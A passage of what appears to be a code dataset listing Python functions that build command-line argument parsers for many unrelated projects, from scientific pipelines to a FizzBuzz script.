psr.add_argument('-nmp', action='store_true', dest='nmp',\n help='unique process approach (useful in development)')\n\n psr.add_argument('-d', action='store_true', dest='debug',\n help='print debug information')\n\n psr.add_argument('-c', '--config', action='store',\n dest='config',\n help='load an specific config profile')\n\n psr.add_argument('-p', '--port', action='store',\n dest='port',\n help='launches service on specific port')\n\n return psr.parse_args()", "def _setup_parser(self):\n parser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter,\n description=\"Manage Kiji stuff for MovieAdvisor. Available actions:\\n\\t\" + \\\n \"\\n\\t\".join(self.possible_actions))\n\n # TODO: Detailed help information that prints out all of the available actions and their\n # assumptions\n\n parser.add_argument(\n \"action\",\n nargs='*',\n help=\"Action to take\")\n\n parser.add_argument(\n '--bento-home',\n help='Location of bento box',\n default='kiji-bento-ebi')\n\n parser.add_argument(\n '--bento-tgz',\n help='Bento TAR file name',\n default='kiji-bento-ebi-2.0.2-release.tar.gz')\n\n parser.add_argument(\n '--movie-advisor-home',\n help='Location of checkout of WibiData MovieAdvisor github repo',\n default='movie-advisor')\n\n # Set up dates for training, testing, etc.\n parser.add_argument(\n '--train-start-date',\n default='2013-11-01')\n\n parser.add_argument(\n '--train-end-date',\n default='2013-11-15')\n\n parser.add_argument(\n '--test-start-date',\n default='2013-11-16')\n\n parser.add_argument(\n '--test-end-date',\n default='2013-11-30')\n\n parser.add_argument(\n \"--backtest-results-file\",\n default=\"backtest.txt\")\n\n parser.add_argument(\n \"--kill-bento\",\n action=\"store_true\",\n default=False,\n help=\"Automatically kill existing BentoBox processes.\")\n\n parser.add_argument(\n \"--show-classpath\",\n action=\"store_true\",\n default=False,\n help=\"Echo $KIJI_CLASSPATH and exit\")\n\n return parser", "def setup_parser():\n parser = argparse.ArgumentParser(\n prog=\"fedora-owner-change\")\n parser.add_argument(\n '--nomail', action='store_true',\n help=\"Prints the report instead of sending it by email\")\n parser.add_argument(\n '--debug', action='store_true',\n help=\"Outputs debugging info\")\n return parser", "def parseCommandLine():\n\n # Arguments\n parser = argparse.ArgumentParser(description='''trailer.py checks Fortran files for trailing white space.''',\n epilog='Written by A.Adcroft, 2017.')\n parser.add_argument('files_or_dirs', type=str, nargs='+',\n metavar='FILE|DIR',\n help='''Fortran files or director in which to search for Fortran files (with .f, .f90, .F90 suffixes).''')\n parser.add_argument('-e','--exclude_dir', type=str, action='append',\n metavar='DIR',\n help='''Exclude directories from search that end in DIR.''')\n parser.add_argument('-l','--line_length', type=int, default=120,\n help='''Maximum allowed length of a line.''')\n parser.add_argument('-d','--debug', action='store_true',\n help='turn on debugging information.')\n args = parser.parse_args()\n\n global debug\n debug = args.debug\n\n main(args)", "def parse_command_line() -> argparse.Namespace:\n parser = argparse.ArgumentParser()\n parser.add_argument(\n 'pet_database',\n type=str,\n help='path to pet database'\n )\n parser.add_argument(\n '--image_dir',\n default='data/images'\n )\n parser.add_argument(\n '--log',\n default=None,\n help='log file path'\n )\n\n args = parser.parse_args()\n args.pet_database = os.path.abspath(os.path.expanduser(args.pet_database))\n args.image_dir = os.path.abspath(os.path.expanduser(args.image_dir))\n args.log = os.path.abspath(os.path.expanduser(args.log)) if args.log else None\n return args", "def parse_command_line():\n parser = argparse.ArgumentParser()\n\n # Optional Argument\n parser.add_argument('-l', '--length', metavar='length', type=float, default=2, help='length (meter)')\n parser.add_argument('-k', '--conductivity', metavar='conductivity', type=float, default=0.5, help='constant thermal conductivity (W/m.K)')\n parser.add_argument('-q', '--heatgeneration', metavar='heatgeneration', type=float, default=1000, help='uniform heat generation (kW/m^3)')\n parser.add_argument('-TA', '--tempA', metavar='tempA', type=int, default=100, help='temperature at A (Celcius)')\n parser.add_argument('-TB', '--tempB', metavar='tempB', type=int, default=200, help='temperature at A (Celcius)')\n parser.add_argument('-n', '--nodes', metavar='nodes', type=int, default=5, help='nodes (positive integer)')\n parser.add_argument('-A', '--area', metavar='area', type=float, default=1, help='area (m^2)')\n parser.add_argument('-nf', '--nofigure', action='store_true', help='disable figure')\n parser.add_argument('-nd', '--nodetail', action='store_true', help='disable detail')\n return parser.parse_args()", "def create_parser():\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n add_help=False)\n parser.add_argument(\n '--help', '-h',\n action='store_true',\n dest='help',\n help=\"\"\"show this help message and exit\"\"\")\n parser.add_argument(\n '--verbose', '-v',\n action='count',\n default=0,\n help=\"\"\"Enable verbose output from '%(prog)s'. A second and third\n '-v' increases verbosity.\"\"\")\n parser.add_argument(\n '--sequential',\n action='store_true',\n help=\"\"\"Execute analyzer sequentialy.\"\"\")\n parser.add_argument(\n '--cdb',\n metavar='<file>',\n default=\"compile_commands.json\",\n help=\"\"\"The JSON compilation database.\"\"\")\n return parser", "def make_parser():\n parser = argparse.ArgumentParser(description='')\n parser.add_argument('-p', '--platform', dest='platform', type=str, required=False, default='')\n return parser", "def create_parser():\n pass", "def get_parser():\n\tparser = argparse.ArgumentParser('preprocessing.py',\n\t\tformatter_class=argparse.RawDescriptionHelpFormatter,\n\t\tdescription=\"\"\"\nRun a piepline for one NICER ObsID data. \n\t\t\"\"\"\n\t\t)\n\tversion = '%(prog)s ' + __version__\n\tparser.add_argument('obsid', type=str, \n\t\thelp='ObsID (e.g., 4012010109)')\t\n\treturn parser", "def parse_command_line():\n parser = argparse.ArgumentParser(\"Falcon Quick Scan\")\n parser.add_argument(\"-f\", \"--config\",\n dest=\"config_file\",\n help=\"Path to the configuration file\",\n required=False\n )\n parser.add_argument(\"-l\", \"--log-level\",\n dest=\"log_level\",\n help=\"Default log level (DEBUG, WARN, INFO, ERROR)\",\n required=False\n )\n parser.add_argument(\"-d\", \"--check-delay\",\n dest=\"check_delay\",\n help=\"Delay between checks for scan results\",\n required=False\n )\n parser.add_argument(\"-p\", \"--pattern\",\n dest=\"pattern\",\n help=\"Target file patterns to scan (defaults to *.*)\",\n required=False\n )\n parser.add_argument(\"-r\", \"--region\",\n dest=\"region\",\n help=\"Region the target bucket resides in\",\n required=False\n )\n parser.add_argument(\"-t\", \"--target\",\n dest=\"target\",\n help=\"Target folder or bucket to scan. Bucket must have 's3://' prefix.\",\n required=True\n )\n\n return parser.parse_args()", "def init_parser():\n parser = argparse.ArgumentParser(\n description='Backup application code and data.')\n parser.add_argument('-a', '--app-id', required=True,\n help='the application ID to run the backup for')\n parser.add_argument('--source-code', action='store_true',\n default=False, help='backup the source code too. Disabled by default.')\n parser.add_argument('-d', '--debug', required=False, action=\"store_true\",\n default=False, help='display debug messages')\n parser.add_argument('--skip', required=False, nargs=\"+\",\n help='skip the following kinds, separated by spaces')\n\n return parser", "def parser():\n fetch_all_news_codes()\n load_config_key()\n\n if not sys.argv[1:]:\n print(\"Arguments needed. Use argument --help/-h for more information.\")\n else:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--show_all\", \"-sa\", action=\"store_true\",\n help=\"Shows all available news channel codes.\")\n parser.add_argument(\"--categories\", \"-c\", action=\"store_true\",\n help=\"Shows all available news categories.\")\n parser.add_argument(\"--show\", \"-s\", action=\"store\",\n help=\"Shows all news channel codes for a specified category.\")\n parser.add_argument(\"--news\", \"-n\", type=str, help=\"Shows news articles \"\n \"for a specified news channel code.\")\n args = parser.parse_args()\n\n if args.show_all:\n show_sources_all()\n elif args.categories:\n show_categories()\n elif args.show:\n show_sources_category(args.show)\n elif args.news:\n if args.news in news_codes:\n show_news(args.news, BASE_URL)\n else:\n print(\"Invalid news code.\")\n sys.exit(1)", "def initCmdLineParser():\n\n # Init parser and all general flags\n logging.debug(\"initiating command line option parser\")\n usage = \"usage: %prog [options]\"\n parser = OptionParser(usage)\n parser.add_option(\"--gen-answer-file\", help=\"Generate a template of an answer file, using this option excludes all other option\")\n parser.add_option(\"--answer-file\", help=\"Runs the configuration in none-interactive mode, extracting all information from the \\\n configuration file. using this option excludes all other option\")\n parser.add_option(\"--no-mem-check\", help=\"Disable minimum memory check\", action=\"store_true\", default=False)\n\n # For each group, create a group option\n for group in controller.getAllGroups():\n groupParser = OptionGroup(parser, group.getKey(\"DESCRIPTION\"))\n\n for param in group.getAllParams():\n cmdOption = param.getKey(\"CMD_OPTION\")\n paramUsage = param.getKey(\"USAGE\")\n optionsList = param.getKey(\"OPTION_LIST\")\n useDefault = param.getKey(\"USE_DEFAULT\")\n if not useDefault:\n if optionsList:\n groupParser.add_option(\"--%s\" % cmdOption, metavar=optionsList, help=paramUsage, choices=optionsList)\n else:\n groupParser.add_option(\"--%s\" % cmdOption, help=paramUsage)\n\n # Add group parser to main parser\n parser.add_option_group(groupParser)\n\n return parser", "def _ParseCommandArguments():\n arg_parser = argparse.ArgumentParser()\n arg_parser.usage = __doc__\n\n arg_parser.add_argument('--download-dir',\n type=str,\n required=True,\n help='Directory into which corpora are downloaded.')\n arg_parser.add_argument('--build-dir',\n required=True,\n type=str,\n help='Directory where fuzzers were built.')\n args = arg_parser.parse_args()\n return args", "def make_parser():\n p = argparse.ArgumentParser(\n description=\"Visualize and analyze error from oblique/straight tag observations\"\n )\n\n p.add_argument(\"-n\", help=\"name of the test in the config file\")\n\n p.add_argument(\"-t\", help=\"throw out bad tags\", action=\"store_true\")\n\n p.add_argument(\"-v\", help=\"visualize data\", action=\"store_true\")\n\n p.add_argument(\"-i\", help=\"print result data\", action=\"store_true\")\n\n return p", "def get_parser():\n parser = argparse.ArgumentParser(description='RL training for MEDA')\n # device\n parser.add_argument('--cuda', help='CUDA Visible devices', default='0', type=str, required=False)\n parser.add_argument('--algo', help='RL Algorithm', default='PPO', type=str, required=False, choices=list(ALGOS.keys()))\n # rl training\n parser.add_argument('--method', help='The method use for rl training (centralized, sharing, concurrent)',\n type=str, default='concurrent', choices=['centralized', 'sharing', 'concurrent'])\n parser.add_argument('--n-repeat', help='Number of repeats for the experiment', type=int, default=3)\n parser.add_argument('--start-iters', help='Number of iterations the initialized model has been trained',\n type=int, default=0)\n parser.add_argument('--stop-iters', help='Total number of iterations (including pre-train) for one repeat of the experiment',\n type=int, default=100)\n parser.add_argument('--n-timesteps', help='Number of timesteps for each iteration',\n type=int, default=20000)\n # env settings\n parser.add_argument('--width', help='Width of the biochip', type = int, default = 30)\n parser.add_argument('--length', help='Length of the biochip', type = int, default = 60)\n parser.add_argument('--n-agents', help='Number of agents', type = int, default = 2)\n parser.add_argument('--b-degrade', action = \"store_true\")\n parser.add_argument('--per-degrade', help='Percentage of degrade', type = float, default = 0.1)\n # rl evaluate\n parser.add_argument('--n-evaluate', help='Number of episodes to evaluate the model for each iteration',\n type=int, default=20)\n return parser", "def get_parser():\n\n parser = ArgumentParser()\n\n req_argument = parser.add_argument_group('required arguments')\n\n parser.add_argument(\"-o\", \"--outdir\", type=str, default='result',\n help=\"Path for results\")\n parser.add_argument(\"-fname\", \"--file_name\", type=str, default=\"try1\",\n help=\"The name the output file should have within the output directory\")\n parser.add_argument(\"-freq\", \"--frequency\", type=str,\n help=\"File to read the haplotype frequencies from\")\n parser.add_argument(\"-over\", \"--overlap\", type=str,\n help=\"File to read the peptide vs alleles or peptide vs haplotype data\")\n parser.add_argument(\"-o_a\", \"--overlap_allele\", type=int, default=0,\n help=\"1 if the --overlap file passed in is peptide vs alleles and 0 if it is peptide vs haplotypes and has already been binarized\")\n # parser.add_argument(\"-n\", \"--ntarget\", type=int, default=5,\n # help=\"The ntarget for max n-times coverage\")\n parser.add_argument(\"-maxpep\", \"--max_number_of_pepts\", type=int, default=30,\n help=\"The maximum number of peptides allowed in a vaccine\")\n parser.add_argument(\"-c\", \"--cut\", type=int, default=3,\n help=\"The cut value for ommitting peptides that are too similar; a value of 0 should be provided if similar peptides are not to be excluded from a vaccine design.\")\n\n\n \n return parser", "def parse_args(args: List[str]) -> Optional[argparse.Namespace]:\n\n root = argparse.ArgumentParser(description=inspect.cleandoc('''\n Small cross-platform Python app that can create and update PlatformIO projects from STM32CubeMX .ioc files. It\n uses STM32CubeMX to generate a HAL-framework-based code and alongside creates PlatformIO project with compatible\n parameters to stick them both together. Both CLI and GUI editions are available. Visit\n https://github.com/ussserrr/stm32pio for more information. Use 'stm32pio [command] -h' to see help on the\n particular command'''))\n\n # Global arguments (there is also an automatically added '-h, --help' option)\n root.add_argument('--version', action='version', version=f\"stm32pio {stm32pio.core.util.get_version()}\")\n root.add_argument('-v', '--verbose', help=\"enable verbose output (default level: INFO)\", action='count', default=1)\n\n sub = root.add_subparsers(dest='command', title='commands', description=\"valid commands\", help=\"available actions\")\n\n # Primary operations\n init = sub.add_parser('init', help=\"create config .INI file to check and tweak parameters before proceeding\")\n generate = sub.add_parser('generate', help=\"generate CubeMX code only\")\n pio_init = sub.add_parser('pio_init', help=\"create new compatible PlatformIO project\")\n patch = sub.add_parser('patch', help=\"tweak the project so both CubeMX and PlatformIO could work together\")\n new = sub.add_parser('new', help=\"generate CubeMX code, create PlatformIO project and glue them together\")\n status = sub.add_parser('status', help=\"inspect the project current state\")\n validate = sub.add_parser('validate', help=\"verify current environment based on the config values\")\n clean = sub.add_parser('clean', help=\"clean-up the project (by default, no files will be deleted immediately \"\n \"without your confirmation)\")\n gui = sub.add_parser('gui', help=\"start the graphical version of the application. All arguments will \"\n \"be passed forward, see its own --help for more information\")\n\n # Assign options to commands\n for command in [init, generate, pio_init, patch, new, status, validate, clean, gui]:\n command.add_argument('-d', '--directory', dest='path', default=Path.cwd(),\n help=\"path to the project (current directory, if not given)\")\n for command in [init, pio_init, new, gui]:\n command.add_argument('-b', '--board', dest='board', default='', help=\"PlatformIO board name. \" + board_hint)\n for command in [init, generate, new]:\n command.add_argument('-e', '--start-editor', dest='editor',\n help=\"start the specified editor after an action (e.g. subl, code, atom, etc.)\")\n for command in [generate, new]:\n command.add_argument('-c', '--with-build', action='store_true', help=\"build the project after code generation\")\n for command in [init, new]:\n command.add_argument('-s', '--store-content', action='store_true',\n help=\"save folder initial contents as a cleanup ignore list\")\n clean.add_argument('-s', '--store-content', action='store_true',\n help=\"save project folder contents as a cleanup ignore list and exit\")\n clean.add_argument('-q', '--quiet', action='store_true',\n help=\"suppress the caution about the content removal (be sure of what you are doing!)\")\n\n if len(args) == 0:\n root.print_help()\n return None\n\n return root.parse_args(args)", "def parseCommandLine():\n\n parser = argparse.ArgumentParser(\n description='Determine photometric zeropoint of banzai-reduced LCO imaging data.')\n\n\n parser.add_argument('--log-level', dest='log_level', default='INFO', choices=['DEBUG', 'INFO'],\n help='Set the log level')\n parser.add_argument('--ps1dir', dest='ps1dir', default='~/Catalogs/ps1odi/panstarrs/',\n help='Directory of PS1 catalog')\n parser.add_argument(\"--diagnosticplotsdir\", dest='outputimageRootDir', default=None,\n help='Output directory for diagnostic photometry plots. No plots generated if option is omitted. This is a time consuming task. ')\n parser.add_argument('--photodb', dest='imagedbPrefix', default='~/lcozpplots/lcophotzp.db',\n help='Result output directory. .db file is written here')\n parser.add_argument('--imagerootdir', dest='rootdir', default='/archive/engineering',\n help=\"LCO archive root directory\")\n parser.add_argument('--site', dest='site', default=None, help='sites code for camera')\n parser.add_argument('--mintexp', dest='mintexp', default=60, type=float, help='Minimum exposure time to accept')\n parser.add_argument('--redo', action='store_true')\n parser.add_argument ('--preview', dest='processstatus', default='processed', action='store_const', const='preview')\n\n\n\n mutex = parser.add_mutually_exclusive_group()\n mutex.add_argument('--date', dest='date', default=[None,], nargs='+', help='Specific date to process.')\n mutex.add_argument('--lastNdays', type=int)\n\n\n cameragroup = parser.add_mutually_exclusive_group()\n\n cameragroup.add_argument('--camera', dest='camera', default=None, help='specific camera to process. ')\n cameragroup.add_argument('--cameratype', dest='cameratype', default=None, choices=['fs', 'fl', 'kb'],\n help='camera type to process at selected sites to process. ')\n cameragroup.add_argument('--crawldirectory', default=None, type=str,\n help=\"process all reduced image in specific directoy\")\n\n args = parser.parse_args()\n\n logging.basicConfig(level=getattr(logging, args.log_level.upper()),\n format='%(asctime)s.%(msecs).03d %(levelname)7s: %(module)20s: %(message)s')\n\n args.imagedbPrefix = os.path.expanduser(args.imagedbPrefix)\n\n if args.outputimageRootDir is not None:\n args.outputimageRootDir = os.path.expanduser(args.outputimageRootDir)\n print (\"Writing db to directory: %s\" % args.outputimageRootDir)\n\n if args.crawldirectory is not None:\n args.crawldirectory = os.path.expanduser(args.crawldirectory)\n\n\n\n if (args.lastNdays is not None):\n args.date=[]\n today = datetime.datetime.utcnow()\n for ii in range (args.lastNdays):\n day = today - datetime.timedelta(days=ii)\n args.date.append (day.strftime(\"%Y%m%d\"))\n\n args.date = args.date[::-1]\n\n args.ps1dir = os.path.expanduser(args.ps1dir)\n\n print (args.processstatus)\n return args", "def setParser():\n parser = argparse.ArgumentParser(\n prog=\"Nussinov Algorithm Solver\",\n description=\"A program that runs Nussinov's Algorithm on a given RNA strand and returns the most viable pairings.\"\n )\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument(\"-f\", \"--filepath\", help=\"the path to a text file with a sequence\")\n group.add_argument(\"-s\", \"--sequence\", help=\"the RNA sequence to evaluate\")\n parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", help=\"More verbose output\")\n parser.add_argument(\"-u\", \"--uncommon\", action=\"store_true\", help=\"Use Uncommon RNA matches (G,U)\")\n return parser", "def read_cmd(self):\n\n parser = ArgumentParser(formatter_class=ArgumentDefaultsHelpFormatter)\n req_opts = parser.add_argument_group(\"Required Options\")\n req_opts.add_argument(\"--instance_dir\", required=True,\n help=\"directory with instances (not recursive\")\n \n opt_opts = parser.add_argument_group(\"Optional Options\")\n \n opt_opts.add_argument(\"--fn_suffix\", default=\".*\",\n help=\"suffix of instance file names\")\n opt_opts.add_argument(\"--cutoff\", default=10, type=int,\n help=\"running time cutoff [sec]\")\n opt_opts.add_argument(\"--memlimit\", default=2048, type=int,\n help=\"memory limit\")\n opt_opts.add_argument(\"--ac_budget\", default=360,\n help=\"configuration budget [sec]\")\n opt_opts.add_argument(\"--run_obj\", default=\"runtime\",\n choices=[\"runtime\", \"quality\"],\n help=\"run objective\")\n opt_opts.add_argument(\"--par-factor\", default=10,\n help=\"Factor by which to penalize unsolved instances. Usage may differ based on TAE used.\")\n\n opt_opts.add_argument(\"--binary\", default=\"clingo\",\n help=\"target binary\")\n opt_opts.add_argument(\"--pcs_file\", default=\"pcs/all_params.pcs\",\n help=\"parameter configuration file\")\n opt_opts.add_argument(\"--runsolver\", default=\"binaries/runsolver\",\n help=\"runsolver binary\")\n opt_opts.add_argument(\"--tae_class\", default=None,\n help=\"TAE class to individualize clingo calls -- has to inherit from smac.tae.execute_ta_run_aclib.ExecuteTARunAClib\")\n\n\n opt_opts.add_argument(\"--seed\", default=12345, type=int,\n help=\"random seed\")\n opt_opts.add_argument(\"--verbose_level\", default=logging.INFO,\n choices=[\"INFO\", \"DEBUG\"],\n help=\"random seed\")\n opt_opts.add_argument(\"--tae_args\", default=\"{}\",\n help=\"Miscellaneous options for the TAE\")\n \n\n args_, misc = parser.parse_known_args()\n self._check_args(args_)\n args_.tae_args=json.loads(args_.tae_args)\n\n # remove leading '-' in option names\n misc = dict((k.lstrip(\"-\"), v.strip(\"'\"))\n for k, v in zip(misc[::2], misc[1::2]))\n\n misc[\"instances\"] = self._find_files(dir_=args_.instance_dir, suffix_=args_.fn_suffix)\n misc[\"wallclock_limit\"] = args_.ac_budget\n misc[\"cutoff_time\"] = args_.cutoff\n misc[\"paramfile\"] = args_.pcs_file\n misc[\"algo\"] = \"\"\n misc[\"run_obj\"] = args_.run_obj\n\n return args_, misc", "def build_parser():\n desc = (\"Scrape Hearthstone decks from HearthPwn, then build a SQLite \"\n \"database of the results. Also integrates with omgvamp's Mashape \"\n \"Hearthstone API (http://hearthstoneapi.com/) to build a table of \"\n \"card data that can be used to make more advanced queries.\")\n parser = argparse.ArgumentParser(description=desc)\n parser.add_argument('--buildcards', action='store_true',\n help='(re)build card database from Mashape')\n parser.add_argument('--builddecks', action='store_true',\n help='(re)build deck database from HearthPwn')\n parser.add_argument('--perclass', action='store_true',\n help='get the same number of decks for each class')\n parser.add_argument('--count', type=int,\n help='number of decks to retrieve (per class, if'\n ' --perclass is set)')\n parser.add_argument('--filtering',\n help='the HearthPwn filter used when finding decks, '\n 'as seen in the HearthPwn URL')\n parser.add_argument('--sorting',\n help='the HearthPwn sorting used when finding '\n 'decks, as seen in the HearthPwn URL after '\n '\"&sort=\"')\n parser.add_argument('--patch', type=int,\n help='the HearthPwn patch ID used when finding '\n 'decks, as seen in the HearthPwn URL after '\n '\"&filter-build=\"')\n parser.add_argument('--results', action='store_true',\n help='for all cards, print the: cardname, total decks '\n 'using the card, percentage of decks '\n 'using the card, and average number of the card '\n 'in decks using the card')\n return parser", "def setup_parser():\n PARSER = argparse.ArgumentParser(description='Running GSI')\n\n PARSER.add_argument('analysis_datetime', type=str, help=\"analysis_datetime\")\n PARSER.add_argument('gsi_dir', type=str, help=\"gsi_dir\")\n PARSER.add_argument('gsi_processor', type=int, help=\"gsi_processor\")\n PARSER.add_argument('cycle_interval', type=int, help=\"cycle_interval\")\n PARSER.add_argument('model_vertical_level', type=int, help=\"model_vertical_level\")\n PARSER.add_argument('background_data', type=str, help=\"background_data\")\n PARSER.add_argument('crtm_root', type=str, help=\"crtm_root\")\n PARSER.add_argument('gsi_root', type=str, help=\"gsi_root\")\n \n PARSER.add_argument('--f_prepbufr', type=str, dest=\"f_prepbufr\", default='')\n PARSER.add_argument('--f_1bamua', type=str, dest=\"f_1bamua\", default='')\n PARSER.add_argument('--f_1bhrs4', type=str, dest=\"f_1bhrs4\", default='')\n PARSER.add_argument('--f_1bmhs', type=str, dest=\"f_1bmhs\", default='')\n PARSER.add_argument('--f_gpsro', type=str, dest=\"f_gpsro\", default='')\n PARSER.add_argument('--f_radwnd', type=str, dest=\"f_radwnd\", default='')\n PARSER.add_argument('--f_refInGSI', type=str, dest=\"f_refInGSI\", default='')\n PARSER.add_argument('--model_core', type=str, dest=\"model_core\", default='ARW')\n PARSER.add_argument('--cv_option', type=str, dest=\"cv_option\", default='NAM')\n PARSER.add_argument('--computing_platform', type=str, dest=\"computing_platform\", default='LINUX_PBS')\n PARSER.add_argument('--new_run', type=str, dest=\"new_run\", default='True')\n PARSER.add_argument('--outer_loop', type=int, dest=\"outer_loop\", default=2)\n PARSER.add_argument('--inner_loop', type=int, dest=\"inner_loop\", default=50)\n PARSER.add_argument('--if_clean', type=str, dest=\"if_clean\", default='no')\n\n '''\n python Main_Script.py 2017082112 /mnt/WRF/gsi_test/practice_11 4 1 50 /mnt/WRF/wrf_1FMTHf/wrfinput_d01 /opt/miniconda2/envs/wrf/crtm-2.2.3/CRTM_2.2.3 /opt/miniconda2/envs/wrf/comGSIv3.5_EnKFv1.1 --f_prepbufr /opt/miniconda2/envs/wrf/bufr_stuff/bin/test.bufr\n return PARSER.parse_args(['2017082112', '/home/szhang/gsi_directory/practice_10', \n 4, 1, 50,\n '/home/szhang/gsi_directory/practice_10/background_data', \n '/home/szhang/gsi_directory/practice_10/crtm_root', \n '/home/szhang/gsi_directory/practice_10/gsi_root', \n '--f_prepbufr', '/home/szhang/gsi_directory/practice_10/f_prepbufr'])\n '''\n return PARSER.parse_args()", "def build_parser():\n parser = argparse.ArgumentParser(description='The classic FizzBuzz game in programmatic form.', add_help=False)\n parser.add_argument('-h', '--help', default=argparse.SUPPRESS, action='help',\n help='Show this help message and exit.')\n parser.add_argument('-s', '--start', default=1, type=int, action='store', metavar='START',\n help='The number to start FizzBuzzing at (inclusive).')\n parser.add_argument('stop', type=int, action='store', metavar='STOP',\n help='The number to end FizzBuzzing at (exclusive).')\n return parser", "def parse_commandline():\n parser = optparse.OptionParser(usage = __doc__,version=git_version.verbose_msg)\n\n parser.add_option(\"-t\", \"--timeFile\",help=\"Text file with central times.\",default = 'centralTimes.txt')\n\tparser.add_option(\"-c\", \"--channel\",help=\"IFO channel.\",default = 'L1:GDS-CALIB_STRAIN')\n\tparser.add_option(\"-w\", \"--workdirectory\",help=\"Working directory.\",default = '.')\n\tparser.add_option(\"-s\", \"--sourceDir\",help=\"Name of source directory.\",default = 'source')\n\n opts, args = parser.parse_args()\n return opts", "def build_arg_parser():\n parser = argparse.ArgumentParser(\n description=\"Generate Carla videos with semantic segmentation maps.\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n )\n parser.add_argument(\"--num_runs\", \"-n\", type=int, default=1, help=\"How many simulations to run.\")\n parser.add_argument(\"--fps\", \"-fps\", type=int, default=20, help=\"At how many FPS the simulation is running.\")\n parser.add_argument(\"--num_frames\", \"-f\", type=int, default=200, help=\"How many frames to record.\")\n parser.add_argument(\"--time_inter\", \"-t\", type=int, default=1, help=\"Time interval between recorded frames.\")\n parser.add_argument(\"--vehicles\", \"-v\", type=int, default=80, help=\"Number of other vehicles.\")\n parser.add_argument(\"--pedestrians\", \"-p\", type=int, default=0, help=\"Number of pedestrians.\")\n parser.add_argument(\"--output_dir\", \"-o\", default=\"./images/\", help=\"Data output directory.\")\n parser.add_argument(\"--window_width\", \"-ww\", type=int, default=512, help=\"Width of the Carla window.\")\n parser.add_argument(\"--window_height\", \"-wh\", type=int, default=256, help=\"Height of the Carla window.\")\n parser.add_argument(\"--fov\", \"-fov\", default=120, help=\"Horizontal field of view.\")\n parser.add_argument(\"--sensor_tick\", \"-st\", default=0.0, help=\"Number of seconds between sensor measurements.\")\n return parser", "def _parse_args():\n desc = 'download dependencies for the AST exporter and built it.'\n parser = argparse.ArgumentParser(description=desc)\n parser.add_argument('-c', '--clean-all', default=False,\n action='store_true', dest='clean_all',\n help='clean everything before building')\n thelp = 'sanity test ast exporter using tinycbor (linux only)'\n parser.add_argument('-t', '--test', default=False,\n action='store_true', dest='sanity_test',\n help=thelp)\n parser.add_argument('--with-clang', default=False,\n action='store_true', dest='with_clang',\n help='build clang with this tool')\n parser.add_argument('--without-assertions', default=True,\n action='store_false', dest='assertions',\n help='build the tool and clang without assertions')\n c.add_args(parser)\n args = parser.parse_args()\n c.update_args(args)\n return args", "def _parse_arguments(text):\n parser = argparse.ArgumentParser(\n description=\"Build Python-based Rez packages in just a single command.\",\n )\n\n parser.add_argument(\n \"--hdas\",\n nargs=\"+\",\n help=\"The relative paths to each folder containing VCS-style Houdini HDAs.\",\n )\n\n parser.add_argument(\n \"-i\",\n \"--items\",\n nargs=\"+\",\n help=\"The relative paths to each file/folder to copy / install.\",\n )\n\n parser.add_argument(\n \"-e\",\n \"--eggs\",\n nargs=\"+\",\n help=\"The relative paths to each file/folder to make into a .egg file.\",\n )\n\n parser.add_argument(\n \"--symlink\",\n action=\"store_true\",\n default=linker.must_symlink(),\n help=\"If True, symlink everything back to the source Rez package.\",\n )\n\n parser.add_argument(\n \"--symlink-files\",\n action=\"store_true\",\n default=linker.must_symlink_files(),\n help=\"If True, symlink files back to the source Rez package.\",\n )\n\n parser.add_argument(\n \"--symlink-folders\",\n action=\"store_true\",\n default=linker.must_symlink_folders(),\n help=\"If True, symlink folders back to the source Rez package.\",\n )\n\n known, _ = parser.parse_known_args(text)\n\n return known", "def create_parser():\n helpdict = create_parser.helpdict\n # Customized usage, for more verbosity concerning these subparsers options.\n usage = \"\"\"%(prog)s [-h] [--version] {run,info} ... \"\"\"\n usage += tw.dedent(\"\"\"\\n\n From more help on each of the subcommands, type:\n %(prog)s run -h\n %(prog)s info -h\\n\\n\"\"\")\n\n # parser = ap.ArgumentParser(\n #parser = MpArgumentParser(\n #formatter_class=ap.ArgumentDefaultsHelpFormatter,\n #description='Monte Python, a Monte Carlo code in Python',\n #usage=usage)\n parser = initialise_parser(\n description='Monte Python, a Monte Carlo code in Python', usage=usage)\n\n # -- add the subparsers\n subparser = parser.add_subparsers(dest='subparser_name')\n\n ###############\n # run the MCMC\n runparser = add_subparser(subparser, 'run', help=\"run the MCMC chains\")\n\n # -- number of steps (OPTIONAL)\n runparser.add_argument('-N', help=helpdict['N'], type=positive_int,\n dest='N')\n # -- output folder (OBLIGATORY)\n runparser.add_argument('-o', '--output', help=helpdict['o'], type=str,\n dest='folder')\n # -- parameter file (OBLIGATORY)\n runparser.add_argument('-p', '--param', help=helpdict['p'],\n type=existing_file, dest='param')\n # -- covariance matrix (OPTIONAL)\n runparser.add_argument('-c', '--covmat', help=helpdict['c'],\n type=existing_file, dest='cov')\n # -- jumping method (OPTIONAL)\n runparser.add_argument('-j', '--jumping', help=helpdict['j'],\n dest='jumping', default='fast',\n choices=['global', 'sequential', 'fast'])\n # -- sampling method (OPTIONAL)\n runparser.add_argument('-m', '--method', help=helpdict['m'],\n dest='method', default='MH',\n choices=['MH', 'NS', 'PC', 'CH', 'IS', 'Der', 'Fisher'])\n # -- update Metropolis Hastings (OPTIONAL)\n runparser.add_argument('--update', help=helpdict['update'], type=int,\n dest='update', default=50)\n # -- update Metropolis Hastings with an adaptive jumping factor (OPTIONAL)\n runparser.add_argument('--superupdate', help=helpdict['superupdate'], type=int,\n dest='superupdate', default=0)\n # -- superupdate acceptance rate argument (OPTIONAL)\n runparser.add_argument('--superupdate-ar', help=helpdict['superupdate-ar'], type=float,\n dest='superupdate_ar', default=0.26)\n # -- superupdate acceptance rate tolerance argument (OPTIONAL)\n runparser.add_argument('--superupdate-ar-tol', help=helpdict['superupdate-ar-tol'], type=float,\n dest='superupdate_ar_tol', default=0.01)\n # -- adaptive jumping factor Metropolis Hastings (OPTIONAL)\n runparser.add_argument('--adaptive', help=helpdict['adaptive'], type=int,\n dest='adaptive', default=0)\n # -- adaptive ts argument (OPTIONAL)\n runparser.add_argument('--adaptive-ts', help=helpdict['adaptive-ts'], type=int,\n dest='adaptive_ts', default=1000)\n\n # -- jumping factor (OPTIONAL)\n runparser.add_argument('-f', help=helpdict['f'], type=float,\n dest='jumping_factor', default=2.4)\n # -- temperature 